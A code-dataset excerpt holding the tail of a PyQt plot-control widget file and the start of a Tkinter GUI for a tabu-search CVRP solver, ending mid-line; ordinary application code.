spaces = [-1])\n \n # lib.object.setLayoutSpaces([self.rangeLayout], spaces = [50])\n \n # lib.object.main.showFullScreen()\n \n \n def setRightMenu(self):\n lib.object.setLayout([self.rangeWidget, self.itemWidget, self.statusWidget, self.settingWidget, self.saveWidget, self.tagWidget], self.rightLayout)\n lib.object.setWidth(self.rightWidget, self.menuWidth)\n self.rightWidget.hide()\n widgetlist = lib.object.getLayout(self.rightLayout)\n right_menu = lib.plotcfg.get(\"plotmenu\", None)\n for index in widgetlist:\n widget = widgetlist[index]\n if lib.object.isinstance(widget, [QtGui.QVBoxLayout, QtGui.QHBoxLayout, QtGui.QGridLayout]): widget = lib.object.getLayout(widget)[0]\n if lib.object.isinstance(widget, QtGui.QWidget):\n lib.object.setLayouMargins([widget.layout()], [0, 0, 0, 0])\n if right_menu == index:\n widget.show()\n self.rightWidget.show()\n else:\n widget.hide()\n\n def swapRightMenu(self, widgetindex):\n widgetlist = lib.object.getLayout(self.rightLayout)\n lib.object.setWidth(self.rightWidget, 0)\n self.rightWidget.hide()\n for index in widgetlist:\n widget = widgetlist[index]\n if lib.object.isinstance(widget, [QtGui.QVBoxLayout, QtGui.QHBoxLayout, QtGui.QGridLayout]): widget = lib.object.getLayout(widget)[0]\n if lib.object.isinstance(widget, QtGui.QWidget):\n if widget != widgetindex: # 關閉其它目錄\n widget.hide()\n elif widgetindex.isHidden(): # 打開指定目錄\n lib.object.setWidth(widgetindex, self.menuWidth)\n lib.object.setWidth(self.rightWidget, self.menuWidth)\n self.rightWidget.show()\n widgetindex.show()\n lib.plotcfg.set(\"plotmenu\", index)\n else: # 關閉指定目錄\n widgetindex.hide()\n lib.plotcfg.set(\"plotmenu\", None)\n\n def setBottomLayout(self):\n \n \n # self.xAxisAuto = lib.object.setWidth(QtGui.QCheckBox(\"x - auto\"), 85)\n \n \n \n self.xAxisLabel = lib.object.setWidth(QtGui.QLabel(\"X Axis\"), 30)\n self.xAutoRange = lib.object.setWidth(QtGui.QRadioButton(\"Auto\"), 45)\n self.xManualRange = lib.object.setWidth(QtGui.QRadioButton(\"Range\"), 50)\n # plotcontrol = [self.xAxisLabel, self.xAutoRange, self.xManualRange, lib.object.spacer(-1)]\n\n\n xAxisList = [self.xAxisLabel, self.xAutoRange, self.xManualRange, lib.object.spacer(-1)]\n xAxisLayout = lib.object.setHBoxLayout(xAxisList)\n\n\n # X 軸 Radio 群組設定\n self.xBtnGroup = QButtonGroup()\n self.xBtnGroup.addButton(self.xAutoRange)\n self.xBtnGroup.addButton(self.xManualRange)\n self.xBtnGroup.setExclusive(True) # 連動 xAutoRange 與 xManualRange\n self.xBtnGroup.buttonClicked.connect(self.xModeChange)\n \n \"\"\"\n self.yAxisLabel = lib.object.setWidth(QtGui.QLabel(\"Y Axis\"), 30)\n self.yAutoRange = lib.object.setWidth(QtGui.QRadioButton(\"Auto\"), 45)\n self.yManualRange = lib.object.setWidth(QtGui.QRadioButton(\"Range\"), 50)\n \n \n \n # self.yAxisLabel = QtGui.QLabel(\"Y Axis\")\n # self.yAutoRange = QtGui.QRadioButton(\"Auto\")\n # self.yManualRange = QtGui.QRadioButton(\"Range\")\n # self.yMinRange = lib.object.setWidth(QtGui.QDoubleSpinBox(), 70)\n # self.yMaxRange = lib.object.setWidth(QtGui.QDoubleSpinBox(), 70)\n # self.yAxisOffset = lib.object.setWidth(QtGui.QDoubleSpinBox(), 70)\n # self.yToLabel = QtGui.QLabel(\"-\")\n # self.yToLabel.setAlignment(Qt.AlignHCenter | Qt.AlignVCenter)\n \n \n # self.xRangeSlider = QtGui.QSlider(1)\n # lib.object.setWidth(self.yAxisLabel, 40)\n # lib.object.setWidth(self.yAutoRange, 50)\n # lib.object.setWidth(self.yManualRange, 50)\n # lib.object.setWidth(self.yMinRange, 90)\n # lib.object.setWidth(self.yMaxRange, 90)\n \n # plotcontrol = plotcontrol + [self.yAxisLabel, self.yAutoRange, self.yManualRange, self.yMinRange, \"-\", self.yMaxRange, lib.object.spacer(-1)]\n \n \n yAxisList = [self.yAxisLabel, self.yAutoRange, self.yManualRange, lib.object.spacer(-1)]\n yAxisLayout = lib.object.setHBoxLayout(yAxisList)\n \n \n \n\n \n \n\n # 是否自動更新圖示\n self.drawAutoGraphics = True\n if self.drawAutoGraphics:\n self.xAutoRange.setChecked(True)\n self.xModeChange(self.xAutoRange)\n else:\n self.xManualRange.setChecked(True)\n self.xModeChange(self.xManualRange)\n \"\"\"\n\n\n\n\n\n # plotcontrol = plotcontrol + [self.timeBox, self.xSampleAllRange, self.xSampleSizeRange, self.xSampleNum]\n\n\n\n\n \"\"\"\n self.timeMode = QtGui.QRadioButton(\"Time\")\n self.sampleMode = QtGui.QRadioButton(\"Sample\")\n # 顯示模式群組設定\n self.dataModeGroup = QButtonGroup()\n self.dataModeGroup.addButton(self.timeMode)\n self.dataModeGroup.addButton(self.sampleMode)\n self.dataModeGroup.setExclusive(True)\n self.dataMode = self.timeMode\n self.dataModeGroup.buttonClicked.connect(self.dataModeChange)\n if self.dataMode == self.timeMode: self.timeMode.setChecked(True)\n else: self.sampleMode.setChecked(True)\n self.dataModeChange(self.dataMode)\n \"\"\"\n \n\n\n \n\n\n \n\n \n # lib.object.setLayout({0: plotcontrol}, self.layoutPlotControl)\n lib.object.setLayout([[xAxisLayout]], self.layoutPlotControl)\n\n\n\n def setPlotLayout(self):\n self.plotWidget = lib.object.setVBoxLayout([], True, spaces = [0], margins = [0, 0, 0, 0])\n self.plotLayout = self.plotWidget.layout()\n # X 捲軸設定\n self.xRangeSlider = QtGui.QScrollBar(1)\n [xMinSlider, xMaxSlider] = [0, 10000]\n self.xRangeSlider.setRange(xMinSlider, xMaxSlider)\n self.xRangeSlider.setValue(xMaxSlider) # 設定最新的顯示\n self.xRangeSlider.valueChanged.connect(lambda value: self.xRangeChanged([self.xRangeSlider.minimum(), value, self.xRangeSlider.maximum()]))\n lib.object.setLayout([self.graphics, self.xRangeSlider], self.plotLayout, spaces = [0])\n\n def setStatusLayout(self):\n self.statusWidget = lib.object.setGridLayout([], True)\n self.statusLayout = self.statusWidget.layout()\n # self.statusLayout.setColumnMinimumWidth(0, 60)\n \n \n lib.object.setLayoutWidth(self.statusLayout, col = {0: 60})\n \n \n self.timeLabel = QtGui.QLabel(\"00:00:00\")\n self.sampleLabel = QtGui.QLabel(\"0\")\n self.intervalLabel = QtGui.QLabel(\"0.0\")\n # timelist = [\"Time\", self.timeLabel]\n # samplelist = [\"Samples\", self.sampleLabel]\n # separator = lib.painter(h = True) #Painter()\n # separator.update()\n \n # separator = lib.painter() #Painter()\n # separator.setSize(10,500)\n # separator.callback.addCallback(separator.drawVSeparator)\n statuslist = {}\n statuslist[0] = [\"time\", self.timeLabel, lib.object.spacer(0,0)]\n statuslist[1] = [\"sample\", self.sampleLabel]\n statuslist[2] = [\"interval\", self.intervalLabel]\n statuslist[3] = [lib.object.hseparator()]\n statuslist[4] = [lib.object.spacer(0, -1)]\n lib.object.setLayout(statuslist, self.statusLayout)\n \n \n \n \n \n # self.controlWidget = lib.object.setVBoxLayout([self.statusLayout], True)\n # lib.object.setWidth(self.controlWidget, self.rightControlWidth)\n # self.controlLayout = self.controlWidget.layout()\n \n \n \n \n \n # lib.object.setLayout([self.statusLayout], self.horizontalLayoutCenter)\n\n def setTagLayout(self):\n self.tagWidget = lib.object.setVBoxLayout([], True)\n self.tagLayout = self.tagWidget.layout()\n \n \n \n tagsLayout = lib.object.setVBoxLayout([[self.setTitleLabel(\"Tag Setting\", 50), None, lib.object.spaceH()]])\n # lib.object.setLayoutWidth(curveTypeLayout, col = {0: 32})\n lib.object.setLayout([tagsLayout, lib.object.spaceV()], self.tagLayout)\n \n\n def setSaveLayout(self):\n self.saveWidget = lib.object.setVBoxLayout([], True)\n self.saveLayout = self.saveWidget.layout()\n \n self.filename = QtGui.QLineEdit(\"xxxxxx\")\n \n # 儲存檔案設定\n \"\"\"\n def setSaveChange(self, index):\n if self.saveRawdata.checkState() == Qt.Unchecked:\n self.parent.closeFile()\n else:\n if self.graphics.getLogLength(): self.parent.createLogFile1() # 如果有 log 資料 \n \"\"\"\n def funSaveFile():\n logger.info(\"funSaveFile\")\n \n self.savefile = lib.object.setTooltip(QtGui.QCheckBox(\"Save\"), \"曲線資料儲存\")\n # self.savefile.setToolTip(\"曲線資料儲存\")\n self.savefile.stateChanged.connect(funSaveFile)\n \n def funOverwrite(check):\n if check: self.parent.overwrite = True\n else: self.parent.overwrite = False\n\n self.overwrite = lib.object.setTooltip(QtGui.QCheckBox(\"Override File\"), \"原始檔案複寫\")\n self.overwrite.stateChanged.connect(funOverwrite)\n \n # self.serialname = lib.object.setTooltip(QtGui.QCheckBox(\"Serial\"), \"產生\")\n \n self.saveRange = QtGui.QComboBox()\n self.saveRange.addItem(\"Export\")\n self.saveRange.addItem(\"\")\n self.saveRange.addItem(\"latest range\")\n\n\n \n\n self.exportRegion = lib.button(text = \"Export\", callback = self.parent.exportFile)\n\n # self.exportRegion = lib.object.setTooltip(QtGui.QPushButton(\"Export\"), \"區域資料輸出\")\n # self.exportRegion.clicked.connect(self.parent.exportFile)\n\n self.exportRegion1 = QtGui.QPushButton(\"xxxx\")\n self.exportRegion1.clicked.connect(self.parent.exportRangeFile1)\n\n # ====== update 設置 ======\n self.updateDraw = lib.object.setWidth(QtGui.QCheckBox(\"Update (ms)\"), 85)\n self.updateFreq = QtGui.QSpinBox()\n # plotcontrol = plotcontrol + [self.updateDraw, self.updateRate, lib.object.spacer(-1)]\n\n \n [updateRateMin, updateRateNum, updateRateMax] = [10, 100, 10000]\n \n \n \n \n self.graphics.setDelay(updateRateNum)\n self.updateFreq.setRange(updateRateMin, updateRateMax)\n self.updateFreq.setValue(updateRateNum)\n self.updateFreq.valueChanged.connect(self.graphics.setDelay)\n \n \"\"\"\n self.drawGraphics = True # 更新圖示\n self.graphics.setDrawGraphics(self.drawGraphics)\n if self.drawGraphics: self.updateDraw.setCheckState(Qt.Checked)\n else: self.updateDraw.setCheckState(Qt.Unchecked)\n self.updateDraw.stateChanged.connect(self.graphics.setDrawGraphics)\n self.updateDraw.setToolTip(\"Update graphics\")\n \n \"\"\"\n # self.updateFreq.setToolTip(\"minimal update frequency (ms): %d ~ %d\" % (updateRateMin, updateRateMax))\n lib.object.setTooltip(self.updateFreq, \"Minimum update frequency: %d ~ %d ms\" % (updateRateMin, updateRateMax))\n saveRangeLayout = lib.object.setVBoxLayout([[self.setTitleLabel(\"Data Capture\", 50), None, lib.object.spaceH()], [self.savefile, self.overwrite], [\"Name\", self.filename], [\"freq\", self.updateFreq], [\"Region\", self.exportRegion, self.exportRegion1], [\"Range\", self.saveRange]])\n # lib.object.setLayoutWidth(curveTypeLayout, col = {0: 32})\n lib.object.setLayout([saveRangeLayout, lib.object.spaceV()], self.saveLayout)\n \n\n def setSettingLayout(self):\n self.settingWidget = lib.object.setVBoxLayout([], True)\n self.settingLayout = self.settingWidget.layout()\n\n\n\n\n\n\n \n \n \n curveTypeLayout = lib.object.setGridLayout([[self.setTitleLabel(\"Curve Style\", 70), None, lib.object.spaceH()]])\n # lib.object.setLayoutWidth(curveTypeLayout, col = {0: 32})\n lib.object.setLayout([curveTypeLayout, \"jijij\", lib.object.spaceV()], self.settingLayout)\n # lib.object.setHighlight(self.settingWidget)\n # lib.object.setColor(self.settingWidget, bgcolor = (100, 0, 100))\n \n\n def setRangeLayout(self):\n self.rangeWidget = lib.object.setVBoxLayout([], True)\n self.rangeLayout = self.rangeWidget.layout()\n\n # x 時間軸設定\n [timeRange, timeStep] = [9999999999, 0.01]\n self.xMinRange = QtGui.QDoubleSpinBox()\n self.xMaxRange = QtGui.QDoubleSpinBox()\n self.xMinRange.setRange(-timeRange, timeRange)\n self.xMaxRange.setRange(-timeRange, timeRange)\n self.xMinRange.setSingleStep(timeStep)\n self.xMaxRange.setSingleStep(timeStep)\n self.xMinRange.valueChanged.connect(lambda value: self.xRangeChanged([value, self.xMaxRange.value()]))\n self.xMaxRange.valueChanged.connect(lambda value: self.xRangeChanged([self.xMinRange.value(), value]))\n\n # 顯示全部圖示\n def funXRangeModeChange(checked):\n if checked == Qt.Checked: self.graphics.setDrawAllGraphics(x = False)\n else: self.graphics.setDrawAllGraphics(x = True)\n\n self.drawAllGraphics = False\n self.xAllRange = lib.object.setWidth(QtGui.QCheckBox(\"\"), 14)\n self.xAllRange.stateChanged.connect(funXRangeModeChange)\n if self.drawAllGraphics:\n self.xAllRange.setChecked(Qt.Unchecked)\n funXRangeModeChange(Qt.Unchecked)\n else:\n self.xAllRange.setChecked(Qt.Checked)\n funXRangeModeChange(Qt.Checked)\n \n # x 軸 size 大小\n def funXRangeSizeChange(value):\n if self.reportLock == False:\n self.graphics.setDrawAllGraphics(x = False)\n self.xAllRange.setChecked(Qt.Checked)\n self.graphics.setSampleNum(value)\n [sampleMin, sampleNum, sampleMax] = [0.01, 500, 9999999999] # 預設 sample 數\n self.xSizeRange = QtGui.QDoubleSpinBox()\n self.xSizeRange.setRange(sampleMin, sampleMax)\n self.xSizeRange.setSingleStep(sampleMin)\n self.xSizeRange.setValue(sampleNum)\n self.xSizeRange.setToolTip(\"Set time range\")\n self.xSizeRange.valueChanged.connect(lambda value: funXRangeSizeChange(value))\n \n # ====== 時間軸模式 ======\n def funTimeModeChange(status): # 資料顯示型態\n self.timeModeBox.setCurrentIndex(status)\n if self.timeModeBox.currentIndex(): self.graphics.setTimeMode(False) # sample 模式\n else: self.graphics.setTimeMode(True) # time 模式\n\n self.timeModeBox = QtGui.QComboBox()\n self.timeModeBox.addItem(\"Time\")\n self.timeModeBox.addItem(\"Sample\")\n self.timeModeBox.currentIndexChanged.connect(funTimeModeChange)\n funTimeModeChange(1) # 設定時間軸類型\n\n xAxisLayout = lib.object.setGridLayout([[self.setTitleLabel(\"Time Axis\", 60), None, None, lib.object.spaceH()], [\"From\", self.xMinRange], [\"To\", self.xMaxRange], [\"Size\", self.xAllRange, self.xSizeRange], [\"Type\", self.timeModeBox]])\n lib.object.setLayoutWidth(xAxisLayout, col = {0: 32})\n\n # y 資料軸設定\n def funYRangeChange(rangeIndex): # Y 軸區域範圍變動\n if self.reportLock == False:\n self.graphics.setYRangeMode(rangeIndex)\n if self.yViewRange.currentIndex() == 2: self.graphics.setDrawAllGraphics(y = rangeIndex)\n\n [dataRange, dataStep] = [9999999999, 0.01]\n self.yMinRange = QtGui.QDoubleSpinBox()\n self.yMaxRange = QtGui.QDoubleSpinBox()\n self.yMinRange.setRange(-dataRange, dataRange)\n self.yMaxRange.setRange(-dataRange, dataRange)\n self.yMinRange.setSingleStep(dataStep)\n self.yMaxRange.setSingleStep(dataStep)\n self.yMinRange.valueChanged.connect(lambda value: funYRangeChange([value, self.yMaxRange.value()]))\n self.yMaxRange.valueChanged.connect(lambda value: funYRangeChange([self.yMinRange.value(), value]))\n \n # y 軸顯示模式\n def funViewRangeChange(index):\n if index == 0: y = False\n elif index == 1: y = True\n else: y = [self.yMinRange.value(), self.yMaxRange.value()]\n self.graphics.setDrawAllGraphics(y = y)\n\n self.yViewRange = QtGui.QComboBox()\n self.yViewRange.addItem(\"Min range\")\n self.yViewRange.addItem(\"Max range\")\n self.yViewRange.addItem(\"Fixed range\")\n self.yViewRange.currentIndexChanged.connect(funViewRangeChange)\n self.yViewRange.setCurrentIndex(1)\n self.yScaleRange = QtGui.QSlider(Qt.Horizontal)\n self.yScaleRange.setRange(0, 10000)\n self.yScaleRange.setValue(0)\n self.yScaleRange.valueChanged.connect(self.graphics.setYScale)\n yAxisLayout = lib.object.setGridLayout([[self.setTitleLabel(\"Data Axis\", 60), None, None, lib.object.spaceH()], [\"From\", self.yMinRange], [\"To\", self.yMaxRange], [\"View\", self.yViewRange], [\"Scale\", self.yScaleRange]])\n lib.object.setLayoutWidth(yAxisLayout, col = {0: 32})\n \n # downsample 設定\n def funDownSampleMode(mode):\n self.graphics.setDownSampleMode(mode)\n downsample = 2\n self.downsampleMode = QtGui.QComboBox()\n self.downsampleMode.addItem(\"peak\")\n self.downsampleMode.addItem(\"mean\")\n self.downsampleMode.addItem(\"subsample\")\n self.downsampleMode.currentIndexChanged.connect(funDownSampleMode)\n self.downsampleMode.setCurrentIndex(downsample)\n funDownSampleMode(downsample)\n def funDownSampleRange(factor):\n self.downsampleRange.setToolTip(str(factor))\n self.graphics.setDownSampleFactor(factor)\n [downsamplemin, downsamplefactor, downsamplemax] = [1, 10, 100]\n self.downsampleRange = QtGui.QSlider(Qt.Horizontal)\n self.downsampleRange.setRange(downsamplemin, downsamplemax)\n self.downsampleRange.setValue(downsamplefactor)\n self.downsampleRange.valueChanged.connect(funDownSampleRange)\n funDownSampleRange(downsamplefactor)\n \n \n \n downsampleLayout = lib.object.setGridLayout([[self.setTitleLabel(\"Down Sample\", 80), None, None, lib.object.spaceH()], [\"Mode\", self.downsampleMode], [\"Rate\", self.downsampleRange]])\n lib.object.setLayoutWidth(downsampleLayout, col = {0: 32})\n \n \n def funGrid():\n \n if self.xGridLine.checkState() == Qt.Unchecked: value = 0\n else: value = self.gridOpacity.value()\n self.graphics.setPlotGrid(x = value)\n if self.yGridLine.checkState() == Qt.Unchecked: value = 0\n else: value = self.gridOpacity.value()\n self.graphics.setPlotGrid(y = value)\n \"\"\"\n xGrid = self.xGridLine.checkState()\n yGrid = self.yGridLine.checkState()\n value = self.gridOpacity.value()\n logger.info(x)\n \n \n \n \n uu = lambda x: 0 if x == Qt.Unchecked else self.gridOpacity.value()\n logger.info(uu)\n # self.graphics.setPlotGrid(x = lambda x: 0 if x == Qt.Unchecked else self.gridOpacity.value())\n # max = lambda x: 0 if x == Qt.Unchecked else self.gridOpacity.value()\n \"\"\"\n \n [gridMin, gridNum, gridMax] = [0, 128, 255]\n self.xGridLine = QtGui.QCheckBox(\"X\")\n self.yGridLine = QtGui.QCheckBox(\"Y\")\n self.gridOpacity = QtGui.QSlider(Qt.Horizontal)\n self.gridOpacity.setRange(gridMin, gridMax)\n self.gridOpacity.setValue(gridNum)\n self.gridOpacity.valueChanged.connect(lambda value: funGrid())\n \n \n # lib.object.setHighlight(self.xGridLine)\n \n self.xGridLine.stateChanged.connect(lambda value: funGrid())\n self.yGridLine.stateChanged.connect(lambda value: funGrid())\n \n\n \n # def funYGrid():\n # if self.yGridLine.checkState() == Qt.Unchecked: value = 0\n # else: value = self.yGridOpacity.value()\n # self.graphics.setPlotGrid(y = value)\n\n \n\n # self.yGridOpacity = QtGui.QSlider(Qt.Horizontal)\n # self.yGridOpacity.setRange(gridMin, gridMax)\n # self.yGridOpacity.setValue(gridNum)\n # self.yGridOpacity.valueChanged.connect(lambda value: funYGrid())\n\n \n \n plotOptions = [[self.setTitleLabel(\"Plot Options\", 80)], [\"Grid\", self.xGridLine, self.yGridLine, self.gridOpacity]]\n plotOptionsLayout = lib.object.setGridLayout(plotOptions)\n lib.object.setLayoutWidth(plotOptionsLayout, col = {0: 32})\n \n \n funXRangeSizeChange(sampleNum)\n lib.object.setLayout([xAxisLayout, yAxisLayout, downsampleLayout, plotOptionsLayout, lib.object.spaceV()], self.rangeLayout)\n\n # ========================================================================\n # 函數區\n # ========================================================================\n\n \n \n \n \n\n\n\n\n\n\n\n \n\n\n\n\n \n \n\n\n def xModeChange(self, box): # X 軸設定自動或是手動模式\n if box == self.xManualRange: rangeIndex = [self.xRangeSlider.minimum(), self.xRangeSlider.value(), self.xRangeSlider.maximum()] # 捲軸值\n elif box == self.xAutoRange: rangeIndex = None # 不設值\n self.xRangeChanged(rangeIndex)\n\n def xRangeChanged(self, rangeIndex = None): # X 軸區域範圍變動,當 value 值是 None 時則不使用 XRangeMode\n if self.reportLock == False: # 滑鼠直接滑動圖形不驅動\n if rangeIndex != None: self.xManualRange.setChecked(True)\n self.graphics.setXRangeMode(rangeIndex)\n \n\n\n\n\n\n\n # ===== 曲線 Item 選項設置 =====\n def setItemLayout(self, initial = False): # 設定 Item list control\n if initial:\n self.itemWidget = lib.object.setVBoxLayout([], True)\n self.itemLayout = self.itemWidget.layout()\n return\n\n \n\n # 設定 Item \n \n itemhidecheck = QtGui.QCheckBox(\"Legend\")\n itemhidecheck.setCheckState(Qt.Checked)\n itemhidecheck.stateChanged.connect(lambda status: self.graphics.setItemLegend(status))\n \n itemshowvaluecheck = QtGui.QCheckBox(\"Value\")\n itemshowvaluecheck.stateChanged.connect(lambda status: self.graphics.setShowItemValue(status))\n \n # ====== Symbol 設置 ======\n self.symbol = lib.object.setWidth(QtGui.QComboBox(), 95)\n self.symbol.addItem(\"curve\")\n self.symbol.addItem(\"circular\")\n self.symbol.addItem(\"square\")\n self.symbol.addItem(\"triangle\")\n self.symbol.addItem(\"diamond\")\n self.symbol.addItem(\"cross\")\n self.symbol.addItem(\"histogram\")\n self.symbol.currentIndexChanged.connect(lambda currentIndex: self.graphics.setCurveType(currentIndex))\n \n \n itemSetting = [[self.setTitleLabel(\"Legend Setting\", 50), None, lib.object.spaceH()], [itemhidecheck, itemshowvaluecheck], [\"Symbol\", self.symbol], [self.setTitleLabel(\"Legend Item\", 60)]]\n settingLayout = lib.object.setVBoxLayout(itemSetting)\n # 設定 LEGEND\n # layout = [[itemhidecheck, itemshowvaluecheck], [\"Symbol\", self.symbol], [self.setTitleLabel(\"Legend Item\", 60)]]\n\n \n\n \n \n # layout = [[itemhidecheck, itemshowvaluecheck], [\"Symbol\", self.symbol], [self.setTitleLabel(\"Legend Item\", 60)]]\n # legendTitleLayout = lib.object.setVBoxLayout(layout)\n\n def funItemChange(checked): # item list 勾選\n sender = self.parent.sender()\n if sender in itemchecklist:\n text = itemchecklist[sender]\n self.graphics.hideLine(text, sender.checkState())\n\n def funDrawItem(painter): # 畫 item\n painter.qp.setPen(painter.getPen(painter.itemColor))\n painter.qp.translate(0, 0)\n painter.qp.drawLine(0, 8, 16, 8)\n\n itemLegend = []\n itemchecklist = {}\n itemColor = self.graphics.getItemColor()\n itemlist = self.graphics.getItem()\n for index in range(len(itemlist)):\n itemPainter = Painter()\n itemPainter.setSize(16, 16)\n itemPainter.itemName = itemlist[index]\n itemPainter.itemColor = itemColor[itemPainter.itemName]\n itemPainter.callback.addCallback(funDrawItem)\n itemcheck = lib.object.setWidth(QtGui.QCheckBox(\"\"), 16)\n itemcheck.setCheckState(Qt.Checked)\n itemchecklist[itemcheck] = itemlist[index]\n itemcheck.stateChanged.connect(funItemChange)\n layout = [itemcheck, itemPainter, itemPainter.itemName, lib.object.spacer(-1,0)]\n itemLegend.append(layout)\n itemLegend.append(lib.object.spacer(0,-1))\n legendWidget = lib.object.setGridLayout(itemLegend, widget = True, spaces = [3, 3], margins = [0, 0, 0, 0])\n legendLayout = legendWidget.layout()\n legendArea = lib.scrollarea(legendWidget)\n lib.object.setColor(legendWidget, bgcolor = 'w')\n\n lib.object.setLayout([settingLayout, legendArea], self.itemLayout)\n\n\n def setTitleLabel(self, text, width, height = 20):\n width = self.menuWidth\n return lib.object.setTitleLabel(\"\" + text + \"\", fontcolor = \"w\", bgcolor = [100, 100, 100], width = width, height = height)\n\n def setButton(self, image, width = -1):\n button = Button(lib.config.imgpath(image))\n if width != -1: lib.object.setWidth(button, width)\n return button\n \n def updateButton(self, button, image, width = -1):\n button.setImage(lib.config.imgpath(image))\n if width != -1: lib.object.setWidth(button, width)\n ","sub_path":"source/ui/widgets/plotter2/plotter.py","file_name":"plotter.py","file_ext":"py","file_size_in_byte":59425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"151596828","text":"import tkinter as tk\nimport re\nimport math\nimport time\nfrom CVRP import CVRP\nfrom Vertice import Vertice\nimport tkinter.filedialog\nimport os\nfrom tkinter import ttk\nfrom os import listdir\nfrom os.path import isfile, join\nimport ntpath\nimport numpy as np\n\nclass Ventana(tk.Tk):\n def __init__(self):\n tk.Tk.__init__(self)\n self.geometry(\"450x500+350+130\")\n self.title(\"Buqueda tabu aplicada a CVRP\")\n self.__demanda = []\n self.__nroVehiculos = []\n self.__nro = 0\n self.__openFolder = False\n\n self.__tabs = ttk.Notebook(self)\n self.elementosGUI()\n self.__frames = []\n\n self.barraMenus()\n \n def barraMenus(self):\n self.__menu = tk.Menu(self)\n self.__menuArchivo = tk.Menu(self.__menu)\n self.__menuArchivo.add_command(label=\"Open File\", command=self.openFile)\n self.__menu.add_cascade(label=\"File\", menu=self.__menuArchivo)\n self.__menuArchivo.add_command(label=\"Open Folder\", command=self.openFolder)\n\n self.config(menu = self.__menu)\n \n def elementosGUI(self):\n self.__labelSolInicial = []\n self.__labelEstadoGrafo = []\n self.__eSolInicial = []\n self.__combo1 = []\n self.__eOpt = []\n self.__comboOpt = []\n self.__labelTenureADD = []\n self.__labelTenureDROP = []\n self.__boxADD = []\n self.__spinboxDROP = []\n self.__spinboxADD = []\n self.__boxDROP = []\n self.__labelTiempoEjecucion = []\n self.__eTime = []\n self.__entryTiempoEjecucion = []\n self.__labelTEmin = []\n self.__areaDatos = []\n self.__label_RecomiendacTiempo = []\n self.__matrizDistancias = []\n self.__optimo = []\n self.__capacidad = []\n self.__cantidadResolver =[]\n self.__labelCantidadResolver = []\n self.__labelRecomienda =[]\n self.__spinboxCantidadResolver = []\n self.__labelPorcentaje = []\n self.__ePorcentaje = []\n self.__entryPorcentaje = []\n self.__labelPorc = []\n\n def menuConfig(self,frame,i):\n self.__labelEstadoGrafo.append(tk.Label(frame, text = \"No se ha cargado Grafo\"))\n self.__labelEstadoGrafo[i].place(relx=0.4,rely=0.05)\n #Pestañas \n \n #Solucion inicial\n self.__labelSolInicial.append(tk.Label(frame, text = \"Solucion inicial\"))\n self.__labelSolInicial[i].place(relx=0.2, rely=0.15)\n \n self.__combo1list=['Clark & Wright','Vecino mas cercano','Secuencial']\n self.__eSolInicial.append(tk.StringVar())\n self.__combo1.append(ttk.Combobox(frame, textvariable=self.__eSolInicial[i], values=self.__combo1list, width = 29, state = \"disabled\"))\n self.__combo1[i].place(relx=0.4, rely=0.15)\n \n #Tenure ADD\n self.__labelTenureADD.append(tk.Label(frame, text = \"Tenure ADD\"))\n self.__labelTenureADD[i].place(relx=0.2, rely=0.25)\n self.__boxADD.append(tk.IntVar())\n self.__spinboxADD.append(tk.Spinbox(frame, from_ = 1, to = 100, width = 5, state = \"disabled\", textvariable = self.__boxADD))\n self.__spinboxADD[i].place(relx=0.35, rely=0.25)\n\n #Tenure DROP\n self.__labelTenureDROP.append(tk.Label(frame, text = \"Tenure DROP\"))\n self.__labelTenureDROP[i].place(relx=0.50, rely=0.25)\n self.__boxDROP.append(tk.IntVar())\n self.__spinboxDROP.append(tk.Spinbox(frame, from_ = 1, to = 100, width = 5, state = \"disabled\", textvariable = self.__boxDROP))\n self.__spinboxDROP[i].place(relx=0.70, rely=0.25)\n \n #Condicion de parada (Tiempo)\n self.__labelTiempoEjecucion.append(tk.Label(frame, text = \"Tiempo de ejecución\"))\n self.__labelTiempoEjecucion[i].place(relx=0.2, rely=0.4)\n self.__eTime.append(tk.StringVar())\n self.__entryTiempoEjecucion.append(tk.Entry(frame, textvariable = self.__eTime, width = 25, state = \"disabled\"))\n self.__entryTiempoEjecucion[i].place(relx=0.5, rely=0.4,relwidth=0.20)\n self.__labelTEmin.append(tk.Label(frame, text = \"(min)\"))\n self.__labelTEmin[i].place(relx=0.75, rely=0.4)\n\n #Condicion de parada (Porcentaje)\n self.__labelPorcentaje.append(tk.Label(frame, text = \"Porcentaje de parada\"))\n self.__labelPorcentaje[i].place(relx=0.2, rely=0.5)\n self.__ePorcentaje.append(tk.StringVar())\n self.__entryPorcentaje.append(tk.Entry(frame, textvariable = self.__ePorcentaje, width = 25, state = \"disabled\"))\n self.__entryPorcentaje[i].place(relx=0.5, rely=0.5,relwidth=0.20)\n self.__labelPorc.append(tk.Label(frame, text = \"%\"))\n self.__labelPorc[i].place(relx=0.75, rely=0.5)\n\n #Cantidad de Veces a resolver \n self.__labelCantidadResolver.append(tk.Label(frame, text= \"Cantidad de Veces a resolver\"))\n self.__labelCantidadResolver[i].place(relx=0.13, rely = 0.60)\n self.__cantidadResolver.append(tk.IntVar())\n self.__spinboxCantidadResolver.append(tk.Spinbox(frame, from_ = 1, to = 100, width = 5, state = \"readonly\", textvariable = self.__cantidadResolver[i]))\n self.__spinboxCantidadResolver[i].place(relx=0.5, rely=0.60)\n\n def cargarDatos(self):\n self.__myFolder = os.path.basename(self.__mypath)\n for i in range(0,len(self.__listaInstancias)):\n self.__nombreArchivo = self.__listaInstancias[i]\n print(\"Se resolverá \"+ str(self.__cantidadResolver[i].get())+\" veces \"+ self.__nombreArchivo)\n for j in range(0,self.__cantidadResolver[i].get()):\n print(\"RESOLVIENDO ------------------> \"+str(self.__nombreArchivo))\n self.__cvrp = CVRP(self.__matrizDistancias[i], self.__demanda[i], self.__nroVehiculos[i], self.__capacidad[i],\n self.__nombreArchivo+\"_\"+str(self.__eTime[i].get())+\"min\", self.__myFolder, self.getSolucionInicial(self.__eSolInicial[i].get()),\n self.__boxADD[i].get(), self.__boxDROP[i].get(), self.__eTime[i].get(), self.__ePorcentaje[i].get(), self.__optimo[i])\n j\n\n def getSolucionInicial(self,value):\n return self.__combo1list.index(value)\n\n def calcularDatos(self,i):\n if(self.__openFolder):\n self.__labelEstadoGrafo[i].configure(text = \"Grafos Cargados\")\n else:\n self.__labelEstadoGrafo[i].configure(text = \"Grafo Cargado\")\n \n self.__labelRecomienda.append(tk.Label(text = \"Se recomienda los siguientes valores...\"))\n self.__labelRecomienda[i].place(relx=0.3,rely=0.05) \n \n # tenureADD = int(len(self.__matrizDistancias[i])**(1/2.0))\n # tenureDROP = int(len(self.__matrizDistancias[i])**(1/2.0))+1\n\n tenureADD = 